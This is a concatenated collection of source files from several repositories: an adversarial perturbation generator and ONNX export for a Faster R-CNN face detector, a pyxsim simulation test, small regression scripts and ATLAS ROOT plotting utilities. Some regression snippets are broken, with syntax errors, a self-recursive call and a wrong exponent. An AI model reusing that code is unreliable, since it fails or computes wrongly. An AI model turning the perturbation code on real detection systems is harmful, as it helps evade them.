loss_total = loss_NLL + loss_perturb#sum([loss_NLL,loss_perturb])
loss_total.backward()
print('Loss NLL is %f, match %f, perturb %f, total loss %f' % \
(loss_NLL.data,loss_match.data,torch.norm(perturbation,2).data[0],loss_total.data))
# optimizer step for the generator
self.optimizer.step()
# optimizer step for the discriminator (if training adversarially)
# if self.train_adv and model_optimizer:
# discriminator_loss = self.criterion(predictions, labels)
# model_optimizer.zero_grad()
# discriminator_loss.backward()
# model_optimizer.step()
# print perturbation.data.mean(), inputs.data.mean()
# print loss.data[0], torch.norm(perturbation, 2).data[0], torch.norm(inputs, 2).data[0]
# prep the predictions and inputs to be returned
predictions = torch.max(F.log_softmax(adv_rpn_scores.squeeze(),dim=1), 1)[1].cpu().numpy()
num_unperturbed = (predictions == labels.data.cpu().numpy()).sum()
print("Number of images unperturbed is %d out of %d" % \
(num_unperturbed,len(labels)))
iter_count = iter_count + 1
losses = [loss_NLL,loss_match,loss_perturb]
losses = losses + [sum(losses)]
return losses
# adv_inputs = [ adv_inputs[i] for i in range(inputs.size(0)) ]
def perturb(self, inputs, epsilon=1.0):
perturbation = self.generator(inputs)
adv_inputs = inputs + epsilon*perturbation
adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
return adv_inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
```
#### File: joeybose/simple-faster-rcnn-pytorch/convert2onnx.py
```python
from __future__ import division
import os
from PIL import Image
from wider import WIDER
from skimage import transform as sktsf
from data.dataset import Dataset, TestDataset,inverse_normalize
from data.dataset import pytorch_normalze
import numpy as np
import ipdb
import torch
import matplotlib
from torch.utils.data import Dataset, DataLoader
import matplotlib.pyplot as plt
from tqdm import tqdm
from utils.config import opt
from model import FasterRCNNVGG16
from torch.autograd import Variable
from torch.utils import data as data_
from trainer import FasterRCNNTrainer,VictimFasterRCNNTrainer
from utils import array_tool as at
import utils.vis_tool as vz
from utils.vis_tool import visdom_bbox
from utils.vis_tool import vis_bbox,visdom_bbox
from utils.eval_tool import eval_detection_voc
from data.util import read_image
import pandas as pd
from PIL import Image
import attacks
import cv2
import torch.onnx
import torch
import caffe2.python.onnx.backend as backend
import os
import onnx
import numpy as np
def preprocess(img, min_size=600, max_size=1000):
"""Preprocess an image for feature extraction.
The length of the shorter edge is scaled to :obj:`self.min_size`.
After the scaling, if the length of the longer edge is longer than
:param min_size:
:obj:`self.max_size`, the image is scaled to fit the longer edge
to :obj:`self.max_size`.
After resizing the image, the image is subtracted by a mean image value
:obj:`self.mean`.
Args:
img (~numpy.ndarray): An image. This is in CHW and RGB format.
The range of its value is :math:`[0, 255]`.
(~numpy.ndarray): An image. This is in CHW and RGB format.
The range of its value is :math:`[0, 255]`.
Returns:
~numpy.ndarray:
A preprocessed image.
"""
C, H, W = img.shape
scale1 = min_size / min(H, W)
scale2 = max_size / max(H, W)
scale = min(scale1, scale2)
img = img / 255.
try:
img = sktsf.resize(img, (C, H * scale, W * scale), mode='reflect')
except:
ipdb.set_trace()
# both the longer and shorter should be less than
# max_size and min_size
normalize = pytorch_normalze
return normalize(img)
if __name__ == '__main__':
attacker = attacks.Inference_DCGAN(train_adv=False)
attacker.load('/home/joey/Desktop/simple-faster-rcnn-pytorch/checkpoints/max_min_attack_6.pth')
attacker.cpu()
attacker.train(False)
img = read_image('/home/joey/Desktop/simple-faster-rcnn-pytorch/akira_img.jpeg')
img = preprocess(img)
img = torch.from_numpy(img)[None]
img = Variable(img.float())
adv_img = attacker(img,epsilon=1)
# Export ONNX model
torch.onnx.export(attacker, img, "attacker.proto", export_params=True, verbose=True)
# Load ONNX model
model = onnx.load("attacker.proto")
graph = model.graph
# Check Formation
onnx.checker.check_model(model)
onnx.helper.printable_graph(model.graph)
# Print Graph to get blob names
onnx.helper.printable_graph(graph)
# Check model output
ipdb.set_trace()
rep = backend.prepare(graph, device="CPU")
output_onnx = rep.run(img.cpu().data.numpy().astype(np.float32))
# Verify the numerical correctness upto 3 decimal places
np.testing.assert_almost_equal(adv_img.data.cpu().numpy(),
output_onnx[0], decimal=3)
```
#### File: simple-faster-rcnn-pytorch/data/dataset.py
```python
from __future__ import division
import torch as t
from .voc_dataset import VOCBboxDataset
from .wider_dataset import WIDERBboxDataset
from skimage import transform as sktsf
from torchvision import transforms as tvtsf
from . import util
import numpy as np
import pandas as pd
from utils.config import opt
from util import read_image
import torch
import ipdb
def inverse_normalize(img):
if opt.caffe_pretrain:
img = img + (np.array([122.7717, 115.9465, 102.9801]).reshape(3, 1, 1))
return img[::-1, :, :]
# approximate un-normalize for visualize
return (img * 0.5 + 0.5).clip(min=0, max=1) * 255
def pytorch_normalze(img):
"""
https://github.com/pytorch/vision/issues/223
return appr -1~1 RGB
"""
# normalize = tvtsf.Normalize(mean=[0.485, 0.456, 0.406],
# std=[0.229, 0.224, 0.225])
normalize = tvtsf.Normalize(mean=[0.5, 0.5, 0.5],
std=[0.5, 0.5, 0.5])
img = normalize(t.from_numpy(img))
return img.numpy()
def caffe_normalize(img):
"""
return appr -125-125 BGR
"""
img = img[[2, 1, 0], :, :] # RGB-BGR
img = img * 255
mean = np.array([122.7717, 115.9465, 102.9801]).reshape(3, 1, 1)
img = (img - mean).astype(np.float32, copy=True)
return img
def preprocess(img, min_size=600, max_size=1000):
"""Preprocess an image for feature extraction.
The length of the shorter edge is scaled to :obj:`self.min_size`.
After the scaling, if the length of the longer edge is longer than
:param min_size:
:obj:`self.max_size`, the image is scaled to fit the longer edge
to :obj:`self.max_size`.
After resizing the image, the image is subtracted by a mean image value
:obj:`self.mean`.
Args:
img (~numpy.ndarray): An image. This is in CHW and RGB format.
The range of its value is :math:`[0, 255]`.
(~numpy.ndarray): An image. This is in CHW and RGB format.
The range of its value is :math:`[0, 255]`.
Returns:
~numpy.ndarray:
A preprocessed image.
"""
C, H, W = img.shape
scale1 = min_size / min(H, W)
scale2 = max_size / max(H, W)
scale = min(scale1, scale2)
img = img / 255.
img = sktsf.resize(img, (C, H * scale, W * scale), mode='reflect')
# both the longer and shorter should be less than
# max_size and min_size
if opt.caffe_pretrain:
normalize = caffe_normalize
else:
normalize = pytorch_normalze
return normalize(img)
class Transform(object):
def __init__(self, min_size=600, max_size=1000):
self.min_size = min_size
self.max_size = max_size
def __call__(self, in_data):
img, bbox, label = in_data
_, H, W = img.shape
img = preprocess(img, self.min_size, self.max_size)
_, o_H, o_W = img.shape
scale = o_H / H
bbox = util.resize_bbox(bbox, (H, W), (o_H, o_W))
# horizontally flip
img, params = util.random_flip(
img, x_random=True, return_param=True)
bbox = util.flip_bbox(
bbox, (o_H, o_W), x_flip=params['x_flip'])
return img, bbox, label, scale
class Dataset:
def __init__(self, opt):
self.opt = opt
if opt.data == 'wider':
self.db = WIDERBboxDataset(opt.wider_label_dir,\
opt.wider_data_dir,opt.wider_fname_mat)
else:
self.db = VOCBboxDataset(opt.voc_data_dir)
self.tsf = Transform(opt.min_size, opt.max_size)
def __getitem__(self, idx):
ori_img, bbox, label, difficult = self.db.get_example(idx)
img, bbox, label, scale = self.tsf((ori_img, bbox, label))
# TODO: check whose stride is negative to fix this instead copy all
# some of the strides of a given numpy array are negative.
return img.copy(), bbox.copy(), label.copy(), scale
def __len__(self):
return len(self.db)
class FaceLandmarksDataset(Dataset):
"""Face Landmarks dataset."""
def __init__(self):
"""
Args:
csv_file (string): Path to the csv file with annotations.
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.csv_file = '../ext_face/cropped_global_300w.csv'
self.globalDF = pd.read_csv(self.csv_file)
self.g_images = self.globalDF['imgPath']
self.save_dir = '/media/drive/ibug/300W_cropped/frcnn/'
self.save_dir_adv = '/media/drive/ibug/300W_cropped/frcnn_adv/'
self.save_dir_comb = '/media/drive/ibug/300W_cropped/frcnn_comb/'
def __len__(self):
return len(self.g_images)
def __getitem__(self, idx):
img = read_image(self.g_images[idx])
_, H, W = img.shape
scale = H / H
try:
img = preprocess(img)
img, params = util.random_flip(
img, x_random=True, return_param=True)
except:
print("Exception")
img = torch.from_numpy(img)[None]
return img,self.g_images[idx],scale
class TestDataset:
def __init__(self, opt, split='test', use_difficult=True):
self.opt = opt
self.db = WIDERBboxDataset(opt.wider_label_dir,\
opt.wider_val_data_dir,opt.wider_val_fname_mat)
def __getitem__(self, idx):
ori_img, bbox, label, difficult = self.db.get_example(idx)
img = preprocess(ori_img)
return img, ori_img.shape[1:], bbox, label, difficult
def __len__(self):
return len(self.db)
``` |
{
"source": "Joeybraspenning/pyxsim",
"score": 2
} |
#### File: pyxsim/tests/test_sloshing.py
```python
import numpy as np
from pyxsim import \
ThermalSourceModel, \
EventList, make_photons, \
project_photons, merge_files
from pyxsim.tests.utils import hdf5_answer_testing, file_answer_testing
from numpy.testing import assert_array_equal
from numpy.random import RandomState
import yt
import h5py
gslr = "GasSloshingLowRes/sloshing_low_res_hdf5_plt_cnt_0300"
def test_sloshing(answer_store, answer_dir):
prng = RandomState(0x4d3d3d3)
ds = yt.load(gslr, default_species_fields="ionized")
A = 2000.
exp_time = 1.0e4
redshift = 0.1
sphere = ds.sphere("c", (0.5, "Mpc"))
sphere.set_field_parameter("X_H", 0.75)
thermal_model = ThermalSourceModel("apec", 0.1, 11.0, 10000, 0.3,
thermal_broad=False, prng=prng)
n_photons1, n_cells1 = make_photons("photons1", sphere, redshift, A,
exp_time, thermal_model)
hdf5_answer_testing("photons1.h5", answer_store, answer_dir)
n_events1 = project_photons("photons1", "events1", [1.0, -0.5, 0.2],
[30., 45.], absorb_model="tbabs", nH=0.1,
prng=prng)
hdf5_answer_testing("events1.h5", answer_store, answer_dir)
events1 = EventList("events1.h5")
events1.write_fits_file("test_events.fits", (20.0, "arcmin"), 1024)
events1.write_spectrum("test_spec.fits", 0.2, 10.0, 2000)
events1.write_fits_image("test_img.fits", (20.0, "arcmin"), 1024)
file_answer_testing("EVENTS", "test_events.fits", answer_store,
answer_dir)
file_answer_testing("SPECTRUM", "test_spec.fits", answer_store,
answer_dir)
n_photons2, n_cells2 = make_photons("photons2", sphere, redshift, A,
exp_time, thermal_model)
n_events2 = project_photons("photons2", "events2", [1.0, -0.5, 0.2],
[30., 45.], absorb_model="tbabs", nH=0.1,
prng=prng)
merge_files(["photons1.h5", "photons2.h5"], "photons.h5")
merge_files(["events1.h5", "events2.h5"], "events.h5")
with h5py.File("photons.h5", "r") as f, h5py.File("photons1.h5", "r") as f1, \
h5py.File("photons2.h5", "r") as f2:
assert f["data"]["energy"].size == n_photons1 + n_photons2
assert f["data"]["x"].size == n_cells1 + n_cells2
for k in f["data"]:
assert_array_equal(f["data"][k][()],
np.concatenate([f1["data"][k][()],
f2["data"][k][()]]))
with h5py.File("events.h5", "r") as f, h5py.File("events1.h5", "r") as f1, \
h5py.File("events2.h5", "r") as f2:
assert f["data"]["eobs"].size == n_events1 + n_events2
for k in f["data"]:
assert_array_equal(f["data"][k][()],
np.concatenate([f1["data"][k][()],
f2["data"][k][()]]))
``` |
{
"source": "joeybryson001/machine_learning",
"score": 3
} |
#### File: joeybryson001/machine_learning/alternative_error_calculation.py
```python
def calculate_error_2(m,c,data):
total_error_squared = 0
for i in range(len(data)):
y_intercept = data[i][1] + (data[i][0] / m)
x_of_closest_point = (y_intercept - c) / (m - ((-1) / m))
y_of_closest_point = m * x_of_closest_point + c
error = math.sqrt(((x_of_closest_point - data[i][0]) ** 2) + ((y_of_closest_point - data[i][1]) ** 2))
total_error_squared += error ** 2
return total_error_squared
```
#### File: joeybryson001/machine_learning/debug.py
```python
import math
import time
start_time = time.time()
data = [[0,1],[1,2],[2,3],[3,4],[4,5],[5,6],[100000000000000,-90000000000000]]
prediction_x_value = 90
start_m = -100
start_c = -20
acuracy_for_m = 0.00001
acuracy_for_c = 0.00001
step_size = 0.01
acceptible_error = 0.1
def calculate_error(m,c,data):
total_error_squared = 0
for i in range(len(data)):
estimate_y = m * data[i][0] + c
error = data[i][1] - estimate_y
total_error_squared += (error ** 2)
return total_error_squared
def calculate_error_2(m,c,data):
total_error_squared = 0
for i in range(len(data)):
y_intercept = data[i][1] + (data[i][0] / m)
x_of_closest_point = (y_intercept - c) / (m - ((-1) / m))
y_of_closest_point = m * x_of_closest_point + c
error = math.sqrt(((x_of_closest_point - data[i][0]) ** 2) + ((y_of_closest_point - data[i][1]) ** 2))
total_error_squared += error ** 2
return total_error_squared
def calculate_error_derivative(m,c,data):
c_derivative1 = calculate_error(m,c - acuracy_for_c,data)
c_derivative2 = calculate_error(m,c + acuracy_for_c,data)
c_derivative = (c_derivative1 - c_derivative2) / (-2 * acuracy_for_c)
m_derivative1 = calculate_error(m - acuracy_for_m,c,data)
m_derivative2 = calculate_error(m + acuracy_for_m,c,data)
m_derivative = (m_derivative1 - m_derivative2) / (-2 * acuracy_for_m)
return m_derivative, c_derivative
m = start_m
c = start_c
change_m, change_c = calculate_error_derivative(m,c,data)
while change_c + change_m > acceptible_error:
change_m,change_c = calculate_error_derivative(m,c,data)
m = m - step_size * change_m
c = c - step_size * change_c
print("time taken:"+str(time.time() - start_time))
print("prediction for x = "+str(prediction_x_value)+" is "+str(m * prediction_x_value + c))
print("final error is:"+str(calculate_error_derivative(m,c,data)))
print("equation of final line is:y = "+str(m)+"X + "+str(c))
```
#### File: joeybryson001/machine_learning/plane_finder.py
```python
def calculate_differential(data,m,c):
error1 = calculate_differential(m + acuracy,c,data)
error2 = calculate_differential(m + acuracy * ((3 ** (1 / 2)),c - acuracy * ((3 ** (1 / 2))),data)
error3 = calculate_differential(m - acuracy * ((3 ** (1 / 2)),c - acuracy * ((3 ** (1 / 2))),data)
print("iterations:"+str(counter))
print("time taken:"+str(time.time() - start_time))
print("final error is:"+str(calculate_error_derivative(m,c,data)))
if c > 0:
print("equation of final line is:y = "+str(m)+"X + "+str(c))
else:
print("equation of final line is:y = "+str(m)+"X "+str(c))
```
#### File: joeybryson001/machine_learning/polynomial_regession_final.py
```python
from matplotlib import pyplot as plt
import math
import time
def regress(data, final_graph_complexity, starting_params, h, step_size,epsilon, iterations = None):
def calculate_error(params, data, final_graph_complexity):
total_error_squared = 0
for i in range(len(data)):
estimate_y = 0
for l in range(final_graph_complexity):
estimate_y += (data[i][0] ** (final_graph_complexity-1)) * params[l]
error = data[i][1] - estimate_y
total_error_squared += ((error) ** 2)
return total_error_squared
def calculate_error_derivative(params, data, h, final_graph_complexity):
derivitives = []
for i in range(final_graph_complexity):
param_upper = list(params)
param_lower = list(params)
param_upper[i] += h
param_lower[i] -= h
derivitives.append((calculate_error(param_upper, data, final_graph_complexity) - calculate_error(param_lower, data, final_graph_complexity)) / (2 * h))
print(derivitives[1]-derivitives[0])
return derivitives
params = []
for i in range(final_graph_complexity):
if (final_graph_complexity - i - len(starting_params)) > 0:
params.append(0)
else:
for i in range(len(starting_params)):
params.append(starting_params[i])
break
print(params)
print(calculate_error(params,data,final_graph_complexity))
params[0] += 0.00001
if not type(iterations) == int:
while True:
delta = calculate_error_derivative(params, data, h)
for l in range(final_graph_complexity):
params[i] -= step_size * delta[l]
finished = 0
for i in range(final_graph_complexity):
if params[i] < epsilon and params[i] > -epsilon:
finished += 1
if finished == final_graph_complexity:
break
else:
errors = []
derivitive_history = []
parameter_history = []
for i in range(iterations):
delta = calculate_error_derivative(params, data, h, final_graph_complexity)
for l in range(final_graph_complexity):
params[l] -= step_size * delta[l]
errors.append(calculate_error(params,data,final_graph_complexity))
derivitive_history.append(delta)
parameter_history.append(params[0])
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,30))
plt.plot(derivitive_history)
plt.show()
return params
print(regress([[1,1],[2,1],[3,1],[4,1],[5,1],[6,1]],2,[8,2],0.0001,0.000001,0.01,2000))
``` |
{
"source": "joeycarter/atlas-plot-utils",
"score": 3
} |
#### File: atlas-plot-utils/atlasplots/utils.py
```python
from __future__ import absolute_import, division, print_function
import sys
import datetime
import re
from atlasplots.console import bcolor
import ROOT as root
from ROOT import gDirectory
def DrawText(x, y, text, color=1, size=0.05):
"""Draw text.
Parameters
----------
x : float
x position in NDC coordinates
y : float
y position in NDC coordinates
text : string, optional
The text
color : int, optional
Text colour (the default is 1, i.e. black).
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
size : float, optional
Text size
See https://root.cern.ch/doc/master/classTLatex.html
"""
l = root.TLatex()
# l.SetTextAlign(12)
l.SetTextSize(size)
l.SetNDC()
l.SetTextColor(color)
l.DrawLatex(x, y, text)
def GetTTree(filename, treename):
"""Get TTree from file(s).
Returns the TTree if reading a single file or a TChain if reading multiple
files from a directory. Exits if file or tree cannot be read.
Parameters
----------
filename : str
Name of ROOT file or the containing directory
treename : str
Name of TTree
Returns
-------
TTree or TChain
The TTree or TChain
"""
if filename.endswith(".root"):
file = root.TFile.Open(filename)
print("Reading in tree {} from {}... "
.format(bcolor.bold + treename + bcolor.end, filename), end="")
if not file:
# ROOT prints its own "file not found" message
print("{}".format(bcolor.red + "Failed" + bcolor.end))
sys.exit(1)
tree = file.Get(treename)
if not tree:
print("{}".format(bcolor.red + "Failed" + bcolor.end))
print("{} Tree '{}' not found in {}"
.format(bcolor.warning(), treename, filename))
# Look into file to see what else is there
items_in_file = file.GetListOfKeys()
if items_in_file is not None:
print("\nDid you mean:")
for item in items_in_file:
print(" * {}".format(item.GetName()))
sys.exit(1)
print("{}".format(bcolor.ok()))
else:
# TODO: Exception handling
chain = root.TChain(treename)
chain.Add(filename + "/*.root")
tree = chain
# tree.SetDirectory(0)
return file, tree
def GetTChain(filenames, treename):
"""Get TChain (list of Root files containing the same tree)
Parameters
----------
filenames : [str]
Name(s) of ROOT file(s)
treename : str
Name of TTree
Returns
-------
TTree or TChain
The TTree or TChain
"""
if type(filenames) is not list:
filenames = [filenames]
chain = root.TChain(treename)
for file in filenames:
chain.Add(file)
return chain
def MakeHistogram(tree, plotname, nbins, xmin, xmax, selections="", shift="", label=""):
"""Make histogram from a TTree.
Parameters
----------
tree : TTree
The tree from which the histogram is made
plotname : str
The plot name; i.e. the name of the branch (or variable) being plotted
nbins : int
Number of bins
xmin : float
Lower edge of first bin
xmax : float
Upper edge of last bin (not included in last bin)
selections : str, optional
Apply selections.
See ``TTree::Draw()`` at https://root.cern.ch/doc/master/classTTree.html
for more information
shift : str, optional
Shift histogram by this amount; subtacts this value from the variable
being plotted
label : str, optional
The histogram's label; i.e. the entry that will appear in the legend
Returns
-------
TH1
The histogram
"""
histname = plotname
# Use current time to uniquely identify histograms
unique_id = datetime.datetime.now().isoformat()
histname += "_{}".format(unique_id)
# Remove reserved characters
histname = histname.replace("/", "")
histname = histname.replace("*", "")
histname = histname.replace("(", "")
histname = histname.replace("-", "_")
histname = histname.replace(")", "")
histname = histname.replace(":", "")
histname = histname.replace(".", "")
indices = "({},{},{})".format(nbins, xmin, xmax)
if shift:
plotname += "-{}".format(shift)
tree.Draw(plotname + ">>" + histname + indices, selections, "e")
hist = gDirectory.Get(histname)
hist.SetDirectory(0)
if hist.GetEntries() == 0:
print("{} Histogram is empty!".format(bcolor.warning()))
if label:
hist.label = label
return hist
def SetHistogramLine(hist, color=1, width=1, style=1, alpha=1):
"""Set the histogram line properties.
See https://root.cern.ch/doc/master/classTAttLine.html for more information
on line properties.
Parameters
----------
hist : TH1
The histogram
color : int, optional
Line colour (the default is 1, i.e. black).
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
width : int, optional
Line width in pixels; between 1 and 10 (the default is 1)
style : int, optional
Line style; between 1 and 10 (the default is 1, i.e. solid line)
alpha : float, optional
Line transparency; between 0 and 1 (the default is 1, i.e. opaque)
"""
hist.SetLineColor(color)
hist.SetLineWidth(width)
hist.SetLineStyle(style)
hist.SetLineStyle(alpha)
def SetHistogramFill(hist, color=None, style=None, alpha=1):
"""Set the histogram fill properties.
If ``SetHistogramFill()`` is called with no colour specified, the fill colour
is set to the same as the histogram's line colour.
See https://root.cern.ch/doc/master/classTAttFill.html for more information
on fill properties.
Parameters
----------
hist : TH1
The histogram
color : int, optional
Fill colour.
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
style : int, optional
Fill style; this one's complicated so best to see the ROOT documentation
alpha : float, optional
Fill transparency; between 0 and 1 (the default is 1, i.e. opaque)
"""
if style is not None:
hist.SetFillStyle(style)
if color is not None:
hist.SetFillColor(color)
else:
hist.SetFillColor(hist.GetLineColor())
if alpha != 1:
hist.SetFillColorAlpha(color, alpha)
def FormatHistograms(hists, title="", xtitle="", ytitle="", xtitle_offset=None,
ytitle_offset=None, units="", max=None, min=0):
"""Format histograms and add axis labels.
Typically the y-axis label contains the bin width with units, for example,
"Events / 10 GeV". The preferred way to get the bin width is at run time
rather than computing it by hand and including it in the config file. So, if
no units are specified, the function will try to parse the units from the
x-axis label and apply it to the y-axis.
Parameters
----------
hists : [TH1]
List of histograms
title : str, optional
Histogram title; typically empty (the default is "")
xtitle : str, optional
x-axis label (the default is "")
ytitle : str, optional
y-axis label (the default is "")
xtitle_offset : float, optional
Label offset from x-axis (the default is None, i.e. use ROOT's default)
ytitle_offset : float, optional
Label offset from y-axis (the default is None, i.e. use ROOT's default)
units : str, optional
Units (the default is "")
max : float, optional
Histogram maximum value (the default is None)
min : float, optional
Histogram minimum value (the default is 0)
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
SetYRange(hists, max, min)
# Try to parse units from xtitle
if not units and xtitle:
pattern = re.compile(r".*\[(.*\w.*)\]\s*$")
match = pattern.search(xtitle)
if match:
units = match.group(1)
else:
units = ""
for hist in hists:
if title:
hist.SetTitle(title)
if xtitle:
hist.GetXaxis().SetTitle(xtitle)
if ytitle:
ytitle += " / {:g} {}".format(hist.GetXaxis().GetBinWidth(1), units)
hist.GetYaxis().SetTitle(ytitle)
if xtitle_offset:
hist.GetXaxis().SetTitleOffset(xtitle_offset)
if ytitle_offset:
hist.GetXaxis().SetTitleOffset(ytitle_offset)
def DrawHistograms(hists, options=""):
"""Draw the histograms.
The histograms should already have their formatting applied at this point
Parameters
----------
hists : [TH1]
List of histograms
options : str, optional
Drawing options (the default is "")
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
for i, hist in enumerate(hists):
if i == 0:
hist.Draw(options)
else:
hist.Draw("same " + options)
def NormalizeHistograms(hists, width=False):
"""Normalize a list of histograms to unity.
Parameters
----------
hists : [TH1]
List of histograms
width : bool, optional
If true, the bin contents and errors are divided by the bin width
(the default is False)
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
option = "width" if width else ""
for hist in hists:
hist.Scale(1.0 / hist.Integral(), option)
def GetMinimum(hists):
"""Get minimum value (i.e. value of 'shortest' bin) of a list of histograms.
Parameters
----------
hists : [TH1]
List of histograms
Returns
-------
float
Minimum value
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
histmin = hists[0].GetMinimum()
for hist in hists:
tmpmin = hist.GetMinimum()
if hist.GetMinimum() < histmin:
histmin = tmpmin
return histmin
def GetMaximum(hists):
"""Get maximum value (i.e. value of 'tallest' bin) of a list of histograms.
Parameters
----------
hists : [TH1]
List of histograms
Returns
-------
float
Maximum value
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
histmin = hists[0].GetMaximum()
for hist in hists:
tmpmin = hist.GetMaximum()
if hist.GetMaximum() > histmin:
histmin = tmpmin
return histmin
def SetYRange(hists, max=None, min=0):
"""Set the y-axis range (max and min) on a list of histograms.
If the max value is not provided, it calls :py:func:`GetMaximum` to get the
maximum value from the list of histograms
Parameters
----------
hists : [TH1]
List of histograms
max : float, optional
Max value (the default is None)
min : float, optional
Min value (the default is 0)
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
if max is None:
plotmax = GetMaximum(hists)
else:
plotmax = max
for hist in hists:
hist.GetYaxis().SetRangeUser(min, plotmax)
def MakePad(name, title, xlow, ylow, xup, yup):
"""Make a pad.
This function replaces the typical TPad constructor because of an
unfortunate quirk of PyROOT that forces you to set the ownership of the Pad
when creating it, otherwise it gives a segmentation fault.
See https://root.cern.ch/doc/master/classTPad.html.
Parameters
----------
name : str
Pad name
title : str
Pad title
xlow : float
The x position of the bottom left point of the pad
ylow : float
The y position of the bottom left point of the pad
xup : float
The x position of the top right point of the pad
yup : float
The y position of the top right point of the pad
"""
pad = root.TPad(name, title, xlow, ylow, xup, yup)
root.SetOwnership(pad, False)
return pad
def MakeLegend(hists, xmin=0.65, ymin=0.65, options="LF"):
"""Draw the legend.
Legend drawing options are:
* L: draw line associated with hists' lines
* P: draw polymarker associated with hists' marker
* F: draw a box with fill associated with hists' fill
* E: draw vertical error bar if option "L" is also specified
See https://root.cern.ch/doc/master/classTLegend.html for full details.
Parameters
----------
hists : [TH1]
List of histograms
xmin : float, optional
The x position of the bottom left point of the legend
(the default is 0.65)
ymin : float, optional
The y position of the bottom left point of the legend
(the default is 0.65)
options : string, optional
Pass these options to TLegend::AddEntry().
Default is "LF"
"""
# If hists is a single value, convert to list
if type(hists) is not list:
hists = [hists]
xmax = xmin + 0.10
ymax = ymin + 0.05 * (len(hists) + 1)
legend = root.TLegend(xmin, ymin, xmax, ymax)
legend.SetTextSize(0.03)
legend.SetFillColor(0)
legend.SetLineColor(0)
legend.SetBorderSize(0)
for hist in hists:
if hasattr(hist, 'label'):
legend.AddEntry(hist, hist.label, options)
else:
legend.AddEntry(hist)
print("{} Making legend but histogram '{}' has no label"
.format(bcolor.warning(), hist.GetTitle()))
return legend
def DrawLine(x1, y1, x2, y2, color=1, width=1, style=1, alpha=1):
"""Draw a line on a histogram.
See https://root.cern.ch/doc/master/classTAttLine.html for more information
on line properties.
Parameters
----------
x1, y1, x2, y2 : float
Line coordinates
color : int, optional
Line colour (the default is 1, i.e. black).
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
width : int, optional
Line width in pixels; between 1 and 10 (the default is 1)
style : int, optional
Line style; between 1 and 10 (the default is 1, i.e. solid line)
alpha : float, optional
Line transparency; between 0 and 1 (the default is 1, i.e. opaque)
"""
line = root.TLine()
if color != 1:
line.SetLineColor(color)
if width != 1:
line.SetLineWidth(width)
if style != 1:
line.SetLineStyle(style)
if alpha != 1:
line.SetLineColorAlpha(alpha)
line.DrawLine(x1, y1, x2, y2)
def DrawLineAt1(hist, color=1, width=1, style=1, alpha=1):
"""Draw a horizontal line at y=1 on a histogram.
This is particularly useful for ratio plots.
See https://root.cern.ch/doc/master/classTAttLine.html for more information
on line properties.
Parameters
----------
hist : TH1
The histogram on which to draw the line
color : int, optional
Line colour (the default is 1, i.e. black).
See https://root.cern.ch/doc/master/classTColor.html.
If you know the hex code, rgb values, etc., use ``ROOT.TColor.GetColor()``
width : int, optional
Line width in pixels; between 1 and 10 (the default is 1)
style : int, optional
Line style; between 1 and 10 (the default is 1, i.e. solid line)
alpha : float, optional
Line transparency; between 0 and 1 (the default is 1, i.e. opaque)
"""
line = root.TLine()
if color != 1:
line.SetLineColor(color)
if width != 1:
line.SetLineWidth(width)
if style != 1:
line.SetLineStyle(style)
if alpha != 1:
line.SetLineColorAlpha(alpha)
line.DrawLine(
hist.GetXaxis().GetXmin(), 1,
hist.GetXaxis().GetXmax(), 1
)
```
#### File: atlas-plot-utils/examples/ratio_plot.py
```python
from __future__ import absolute_import, division, print_function
import os
import argparse
import ROOT as root
from ROOT import gPad
from atlasplots import atlas_style as astyle
from atlasplots import utils
from atlasplots import config_reader as config
def make_outdir(params):
"""Make the output directory.
Optionally place output directory in a parent directory indicating a version
number if provided.
Parameters
----------
params : dict
Dictionary of configuration parameters
Returns
-------
str
Output directory
"""
if 'version' not in params:
outdir = params['outdir']
if not os.path.exists(outdir):
os.makedirs(outdir)
else:
outdir = "{}/{}".format(params['outdir'], params['version'])
if not os.path.exists(outdir):
os.makedirs(outdir)
return outdir
def FormatRatioPlot(h, ymin, ymax, yLabel):
# Define range of y axis
h.SetMinimum(ymin)
h.SetMaximum(ymax)
# Set marker style and draw
h.SetMarkerStyle(20)
h.Draw("same e")
# Y axis ratio plot settings
h.GetYaxis().SetTitle(yLabel)
h.GetYaxis().SetTitleSize(26)
h.GetYaxis().SetTitleFont(43)
h.GetYaxis().SetTitleOffset(1.5)
h.GetYaxis().SetLabelFont(43)
h.GetYaxis().SetLabelSize(26)
h.GetYaxis().SetNdivisions(505)
# X axis ratio plot settings
h.GetXaxis().SetTitleSize(26)
h.GetXaxis().SetTitleFont(43)
h.GetXaxis().SetTitleOffset(4.)
h.GetXaxis().SetLabelFont(43)
h.GetXaxis().SetLabelSize(26)
h.GetXaxis().SetLabelOffset(0.04)
# Parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--verbose", action="store_true",
help="Be verbose")
parser.add_argument("-c", "--config", default="ratio_plot.config.toml",
help="config file")
args = parser.parse_args()
# Get plotting configuration parameters
params = config.read(args.config)
# Create output directory
outdir = make_outdir(params)
# Need to keep track of open files to read from TTree
open_files = []
# Load TTrees
for file in params['file']:
# Replace the tree name with the tree itself
# You can always get the name back with tree.GetName()
tmp_file, file['tree'] = utils.GetTTree(file['name'], file['tree'])
open_files.append(tmp_file)
# ---------- Loop over the set of kinematic variables and plot ---------- #
astyle.SetAtlasStyle()
for plot in params['plot']:
if args.verbose:
print("Creating plot {}".format(plot['name']))
# Create canvas
canv = root.TCanvas(
"canv_" + plot['name'], "", params['canvas']['w'], params['canvas']['h']
)
# List of histograms in plot
hists = []
# ----- Loop over the files and get trees ----- #
for file in params['file']:
if args.verbose:
